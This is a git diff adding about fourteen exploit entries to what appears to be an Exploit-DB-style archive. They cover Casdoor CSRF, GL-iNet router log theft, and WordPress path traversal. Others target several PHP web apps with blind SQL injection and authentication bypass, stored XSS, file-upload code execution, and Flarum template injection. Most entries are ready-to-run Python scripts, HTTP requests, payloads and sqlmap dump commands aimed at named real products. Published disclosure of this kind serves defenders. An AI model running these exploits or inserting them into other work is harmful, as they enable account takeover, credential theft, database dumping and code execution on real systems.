diff --git a/exploits/go/webapps/51961.txt b/exploits/go/webapps/51961.txt
new file mode 100644
index 000000000..3d322ff4c
--- /dev/null
+++ b/exploits/go/webapps/51961.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
+# Application: Casdoor
+# Version: <= 1.331.0
+# Date: 03/07/2024
+# Exploit Author: Van Lam Nguyen
+# Vendor Homepage: https://casdoor.org/
+# Software Link: https://github.com/casdoor/casdoor
+# Tested on: Windows
+# CVE : CVE-2023-34927
+
+Overview
+==================================================
+Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
+This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
+
+Proof of Concept
+==================================================
+
+Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
+
+<html>
+<form action="http://localhost:8000/api/set-password" method="POST">
+    <input name='userOwner' value='built&#45;in' type='hidden'>
+    <input name='userName' value='admin' type='hidden'>
+    <input name='newPassword' value='hacked' type='hidden'>
+    <input type=submit>
+</form>
+<script>
+    history.pushState('', '', '/');
+    document.forms[0].submit();
+</script>
+
+</html>
+
+If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
+
+userOwner: built&#45;in
+userName: admin
+newPassword: hacked
\ No newline at end of file
diff --git a/exploits/hardware/remote/51942.py b/exploits/hardware/remote/51942.py
new file mode 100755
index 000000000..a2d430a60
--- /dev/null
+++ b/exploits/hardware/remote/51942.py
@@ -0,0 +1,79 @@
+# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
+# CVE: CVE-2024-27356
+# Google Dork: intitle:"GL.iNet Admin Panel"
+# Date: 2/26/2024
+# Exploit Author: Bandar Alharbi (aggressor)
+# Vendor Homepage: www.gl-inet.com
+# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
+# Tested Model: GL-X3000 Spitz AX
+# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
+
+import sys
+import requests
+import json
+requests.packages.urllib3.disable_warnings()
+h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}
+
+def DoesTarExist():
+    r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
+    if r.status_code == 200:
+        f = open("logread.tar", "wb")
+        f.write(r.content)
+        f.close()
+        print("[*] Full logs archive `logread.tar` has been downloaded!")
+        print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
+        return True
+    else:
+        print("[*] The `logread.tar` archive does not exist however ... try again later!")
+        return False
+
+def isVulnerable():
+    r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
+    if r1.status_code == 500 and "nginx" in r1.text:
+        r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
+        if  "Admin-Token" in r2.text:
+            j  = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
+            r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
+            ver = r3.json()['result']['firmware_version']
+            model = r3.json()['result']['model']
+            if ver.startswith(('4.')):
+                print("[*] Firmware version (%s) is vulnerable!" %ver)
+                print("[*] Device model is: %s" %model)
+                return True
+    print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
+    return False
+
+def isAlive():
+    try:
+        r = requests.get(url, verify=False, timeout=30, headers=h)
+        if r.status_code != 200:
+            print("[*] Make sure the target's web interface is accessible!")
+            return False
+        elif r.status_code == 200:
+            print("[*] The target is reachable!")
+            return True
+    except Exception:
+        print("[*] Error occurred when connecting to the target!")
+        pass
+    return False
+
+if __name__ == '__main__':
+    if len(sys.argv) != 2:
+        print("exploit.py url")
+        sys.exit(0)
+    url = sys.argv[1]
+    url = url.lower()
+    if not url.startswith(('http://', 'https://')):
+        print("[*] Invalid url format! It should be http[s]://<domain or ip>")
+        sys.exit(0)
+    if url.endswith("/"):
+        url = url.rstrip("/")
+
+    print("[*] GL.iNet Unauthenticated Full Logs Downloader")
+
+    try:
+        if (isAlive() and isVulnerable()) == (True and True):
+            DoesTarExist()
+    except KeyboardInterrupt:
+        print("[*] The exploit has been stopped by the user!")
+        sys.exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/51937.txt b/exploits/php/webapps/51937.txt
new file mode 100644
index 000000000..71563d21c
--- /dev/null
+++ b/exploits/php/webapps/51937.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
+# Date: 2024-03-06
+# Exploit Author: Ven3xy
+# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
+# Version: 2.7.10
+# Tested on: Linux
+
+import sys
+import requests
+from urllib.parse import urljoin
+import time
+
+def exploit(target_url, file_name, depth):
+    traversal = '../' * depth
+
+    exploit_url = urljoin(target_url, '/wp-admin/tools.php')
+    params = {
+        'page': 'backup_manager',
+        'download_backup_file': f'{traversal}{file_name}'
+    }
+
+    response = requests.get(exploit_url, params=params)
+
+    if response.status_code == 200 and response.headers.get('Content-Disposition') \
+            and 'attachment; filename' in response.headers['Content-Disposition'] \
+            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
+        print(response.text)  # Replace with the desired action for the downloaded content
+
+        file_path = f'simplebackup_{file_name}'
+        with open(file_path, 'wb') as file:
+            file.write(response.content)
+
+        print(f'File saved in: {file_path}')
+    else:
+        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")
+
+if __name__ == "__main__":
+    if len(sys.argv) != 4:
+        print("Usage: python exploit.py <target_url> <file_name> <depth>")
+        sys.exit(1)
+
+    target_url = sys.argv[1]
+    file_name = sys.argv[2]
+    depth = int(sys.argv[3])
+    print("\n[+] Exploit Coded By - Venexy    ||    Simple Backup Plugin 2.7.10  EXPLOIT\n\n")
+    time.sleep(5)
+
+
+    exploit(target_url, file_name, depth)
\ No newline at end of file
diff --git a/exploits/php/webapps/51938.py b/exploits/php/webapps/51938.py
new file mode 100755
index 000000000..fe92103e0
--- /dev/null
+++ b/exploits/php/webapps/51938.py
@@ -0,0 +1,83 @@
+# Exploit Title:  Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
+# Google Dork: n/a
+# Date: 04/02/2024
+# Exploit Author: Gian Paris C. Agsam
+# Vendor Homepage: https://github.com/projectworldsofficial
+# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
+# Version: 1.0
+# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
+# CVE : n/a
+
+import requests
+import argparse
+from colorama import (Fore as F, Back as B, Style as S)
+
+BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
+
+parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')
+parser.add_argument('-u', '--url', help='')
+args = parser.parse_args()
+
+
+def banner():
+    print(f"""{FR}
+      ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄  ▄▄▄        ▪  ·▄▄▄▄
+▪     ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪     ██ ██▪ ██
+ ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄  ▄█▀▄ ▐█·▐█· ▐█▌
+▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██
+ ▀█▄▀▪▀▀▀ ▀▀▀  ▀▀▀▀  ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀  ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•
+        Github: https://github.com/offensive-droid
+        {FW}
+    """)
+
+
+# Define the characters to test
+chars = [
+    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
+    'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',
+    'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',
+    'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',
+    '8', '9', '@', '#'
+]
+
+def sqliPayload(char, position, userid, column, table):
+    sqli = 'admin\' UNION SELECT IF(SUBSTRING('
+    sqli += str(column) + ','
+    sqli += str(position) + ',1) = \''
+    sqli += str(char) + '\',sleep(3),null) FROM '
+    sqli += str(table) + ' WHERE uname="admin"\''
+    return sqli
+
+def postRequest(URL, sqliReq, char, position):
+    sqliURL = URL
+    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}
+    req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)
+    if req.elapsed.total_seconds() >= 2:
+        print("{} : {}".format(char, req.elapsed.total_seconds()))
+        return char
+
+    return ''
+
+def theHarvester(target, CHARS, url):
+    #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))
+    print("Retrieving admin password".format(target['table'], target['column'], target['id']))
+    position = 1
+    full_pass = ""
+    while position < 5:
+        for char in CHARS:
+            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])
+            found_char = postRequest(url, sqliReq, char, position)
+            full_pass += found_char
+        position += 1
+    return full_pass
+
+if __name__ == "__main__":
+    banner()
+    HOST = str(args.url)
+    PATH = HOST + "/hotel booking/admin/login.php"
+    adminPassword = {"id": "1", "table": "manager", "column": "upass"}
+    adminPass = theHarvester(adminPassword, chars, PATH)
+    print("Admin Password:", adminPass)
\ No newline at end of file
diff --git a/exploits/php/webapps/51940.txt b/exploits/php/webapps/51940.txt
new file mode 100644
index 000000000..87dc52536
--- /dev/null
+++ b/exploits/php/webapps/51940.txt
@@ -0,0 +1,23 @@
+# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
+# Date: 2024-04-2
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://github.com/opencart/opencart/releases
+# Version: 4.0.2.3
+# Tested on: XAMPP, Linux
+# Contact: https://twitter.com/dmaral3noz
+* Description :
+Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+* Steps to Reproduce :
+- Go to : http://127.0.0.1/index.php?route=product/search&search=test
+- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs
+===========
+Output :
+Parameter: search (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: route=product/search&search=') AND 2427=2427-- drCa
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb
\ No newline at end of file
diff --git a/exploits/php/webapps/51943.txt b/exploits/php/webapps/51943.txt
new file mode 100644
index 000000000..c0a3435a2
--- /dev/null
+++ b/exploits/php/webapps/51943.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
+# Date: 02/04/2024
+# Exploit Author: Sandeep Vishwakarma
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
+# Version: v1.0
+# Tested on: Windows 10
+# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.
+# POC:
+1. Here we go to : http://127.0.0.1/fuelflow/index.php
+2. Now login with default username=mayuri.infospace@gmail.com and Password=admin
+3. Now go to "http://127.0.0.1/fuelflow/admin/web.php"
+4. Upload the san.php file in "Image" field
+5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page
+6. The content of san.php file is given below: <?php phpinfo();?>
+
+# Reference:
+https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md
\ No newline at end of file
diff --git a/exploits/php/webapps/51944.txt b/exploits/php/webapps/51944.txt
new file mode 100644
index 000000000..8bed04d15
--- /dev/null
+++ b/exploits/php/webapps/51944.txt
@@ -0,0 +1,20 @@
+# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
+# Google Dork: NA
+# Date: 28-03-2024
+# Exploit Author: Sandeep Vishwakarma
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
+# Version: v1.0
+# Tested on: Windows 10
+# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -
+v1.0 allows an attacker to execute arbitrary code via a crafted payload to
+the Firstname and lastname parameter in the profile component.
+
+# POC:
+1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile
+2. In fname & lname parameter add payolad
+"><script>alert("Hacked_by_Sandy")</script>
+3. click on submit.
+
+# Reference:
+https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md
\ No newline at end of file
diff --git a/exploits/php/webapps/51945.txt b/exploits/php/webapps/51945.txt
new file mode 100644
index 000000000..8578a107a
--- /dev/null
+++ b/exploits/php/webapps/51945.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)
+# Google Dork: NA
+# Date: 28-03-2024
+# Exploit Author: Sandeep Vishwakarma
+# Vendor Homepage: https://code-projects.org
+# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/
+# Version: v1.0
+# Tested on: Windows 10
+# CVE : CVE-2024-29412
+# Description: Stored Cross Site Scripting vulnerability in
+Hospital Management System - v1.0 allows an attacker to execute arbitrary
+code via a crafted payload to the 'patient_id',
+'first_name','middle_initial' ,'last_name'" in /receptionist.php component.
+
+# POC:
+1. Go to the User Login page: "
+http://localhost/HospitalManagementSystem-gh-pages/
+2. Login with "r1" ID which is redirected to "
+http://localhost/HospitalManagementSystem-gh-pages/receptionist.php"
+endpoint.
+3. In Patient information functionality add this payload
+"><script>alert('1')</script> ,in all parameter.
+4. click on submit.
+
+# Reference:
+https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md
\ No newline at end of file
diff --git a/exploits/php/webapps/51947.txt b/exploits/php/webapps/51947.txt
new file mode 100644
index 000000000..24e10fba5
--- /dev/null
+++ b/exploits/php/webapps/51947.txt
@@ -0,0 +1,27 @@
+Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)
+Date: 03/28/2024
+Exploit Author: Chokri Hammedi
+Vendor Homepage: https://flarum.org/
+Software Link: https://github.com/FriendsOfFlarum/pretty-mail
+Version: 1.1.2
+Tested on: Windows XP
+CVE: N/A
+Description:
+
+The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure.
+
+Steps to Reproduce:
+
+Log in as an administrator on the Flarum forum.
+
+Navigate to the FoF Pretty Mail extension settings.
+
+Edit the email default template and insert the following payload at the end of the template:
+
+{{ include('/etc/passwd') }}
+
+Save the changes to the email template.
+
+Trigger any action that sends an email, such as user registration or password reset.
+
+The recipient of the email will see the contents of the included file (in this case, /etc/passwd) in the email content.
\ No newline at end of file
diff --git a/exploits/php/webapps/51948.txt b/exploits/php/webapps/51948.txt
new file mode 100644
index 000000000..3bb77b552
--- /dev/null
+++ b/exploits/php/webapps/51948.txt
@@ -0,0 +1,28 @@
+Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)
+Date: 03/28/2024
+Exploit Author: Chokri Hammedi
+Vendor Homepage: https://flarum.org/
+Software Link: https://github.com/FriendsOfFlarum/pretty-mail
+Version: 1.1.2
+Tested on: Windows XP
+CVE: N/A
+Description:
+
+The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side
+Template Injection (SSTI) due to the unsafe handling of template variables.
+An attacker with administrative access can inject malicious code into the
+email template, leading to arbitrary code execution on the server.
+
+Steps to Reproduce:
+
+- Log in as an administrator on the Flarum forum.
+- Navigate to the FoF Pretty Mail extension settings.
+- Edit the email default template and insert the following payload:
+
+{{ 7*7 }}
+{{ system('id') }}
+{{ system('echo "Take The Rose"') }}
+
+- Save the changes to the email template.
+- Trigger any action that sends an email, such as user registration or password reset.
+- The recipient of the email will see the result of the injected expressions (e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id') }}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.
\ No newline at end of file
diff --git a/exploits/php/webapps/51949.txt b/exploits/php/webapps/51949.txt
new file mode 100644
index 000000000..cb05a862f
--- /dev/null
+++ b/exploits/php/webapps/51949.txt
@@ -0,0 +1,13 @@
+# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2024-1-19
+# Exploit Author: tmrswrr
+# Category: Webapps
+# Vendor Homepage: https://www.lepton-cms.com/
+# Version : 7.0.0
+
+1 ) Login with admin cred   >  https://127.0.0.1/LEPTON/backend/login/index.php
+2 ) Go to Languages place   > https://127.0.0.1/LEPTON/backend/languages/index.php
+3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?>
+4 ) After click install you will be see result
+
+# Result :  uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)
\ No newline at end of file
diff --git a/exploits/php/webapps/51950.md b/exploits/php/webapps/51950.md
new file mode 100644
index 000000000..790d40dd7
--- /dev/null
+++ b/exploits/php/webapps/51950.md
@@ -0,0 +1,65 @@
+# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24499
+
+### SQL Injection:
+
+> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
+
+### Affected Components:
+
+> /employee_akpoly/Admin/edit_profile.php
+
+> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.
+
+
+![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true)
+
+![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true)
+
+### Description:
+
+> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
+
+## Proof of Concept:
+
+### SQLMap
+
+Save the following request to `edit_profile.txt`:
+
+```
+POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 88
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/employee_akpoly/Admin/edit_profile.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=
+```
+
+Use `sqlmap` with `-r` option to exploit the vulnerability:
+
+```
+sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
+```
+
+
+## Recommendations
+
+When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
\ No newline at end of file
diff --git a/exploits/php/webapps/51951.md b/exploits/php/webapps/51951.md
new file mode 100644
index 000000000..2e620c40f
--- /dev/null
+++ b/exploits/php/webapps/51951.md
@@ -0,0 +1,88 @@
+# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24497
+
+### SQL Injection:
+
+> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
+
+### Affected Components:
+
+> /employee_akpoly/Admin/login.php
+
+> Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.
+
+![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true)
+![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true)
+
+### Description:
+
+> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
+
+## Proof of Concept:
+
+### Manual Exploitation
+
+The payload `' and 1=1-- -` can be used to bypass authentication within admin login page.
+
+```
+POST /employee_akpoly/Admin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/employee_akpoly/Admin/login.php
+Cookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=
+```
+
+### SQLMap
+
+Save the following request to `admin_login.txt`:
+
+```
+POST /employee_akpoly/Admin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 62
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/employee_akpoly/Admin/login.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+txtusername=admin&txtpassword=password&btnlogin=
+```
+
+Use `sqlmap` with `-r` option to exploit the vulnerability:
+
+```
+sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
+```
+
+## Recommendations
+
+When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
\ No newline at end of file
diff --git a/exploits/php/webapps/51952.md b/exploits/php/webapps/51952.md
new file mode 100644
index 000000000..22071abf6
--- /dev/null
+++ b/exploits/php/webapps/51952.md
@@ -0,0 +1,64 @@
+# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24494
+
+### Stored Cross-Site Scripting (XSS):
+
+> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.
+
+### Affected Components:
+
+> add-tracker.php, update-tracker.php
+
+Vulnerable parameters:
+- day
+- exercise
+- pray
+- read_book
+- vitamins
+- laundry
+- alcohol
+- meat
+
+### Description:
+
+> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.
+
+## Proof of Concept:
+
+The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.
+
+Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:
+
+```
+POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 175
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/habit-tracker/home.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
+```
+
+![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)
+
+## Recommendations
+
+When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
\ No newline at end of file
diff --git a/exploits/php/webapps/51953.md b/exploits/php/webapps/51953.md
new file mode 100644
index 000000000..310f2a889
--- /dev/null
+++ b/exploits/php/webapps/51953.md
@@ -0,0 +1,74 @@
+# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24495
+
+### SQL Injection:
+
+> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
+
+### Affected Components:
+
+> delete-tracker.php
+
+### Description:
+
+> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
+
+## Proof of Concept:
+
+### Manual Exploitation
+
+The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:
+
+```
+GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+```
+
+![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)
+
+### SQLMap
+
+Save the following request to `delete_tracker.txt`:
+
+```
+GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+```
+
+Use `sqlmap` with `-r` option to exploit the vulnerability:
+
+```
+sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump
+```
+
+## Recommendations
+
+When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
\ No newline at end of file
